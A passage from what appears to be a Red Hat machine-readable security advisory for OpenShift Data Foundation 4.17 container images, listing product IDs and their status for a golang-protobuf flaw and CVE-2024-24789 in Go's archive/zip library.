"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang-protobuf: encoding/protojson, internal/encoding/json: infinite loop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON", }, { cve: "CVE-2024-24789", cwe: { id: "CWE-20", name: "Improper Input Validation", }, discovery_date: "2024-06-17T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2292668", }, ], notes: [ { category: "description", text: "A flaw was found in Golang. The ZIP implementation of the Go language archive/zip library behaves differently than the rest of the ZIP file format implementations. When handling ZIP files with a corrupted central directory record, the library skips over the invalid record and processes the next valid one. This flaw allows a malicious user to access hidden information or files inside maliciously crafted ZIP files.", title: "Vulnerability description", }, { category: "summary", text: "golang: archive/zip: Incorrect handling of certain ZIP files", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", 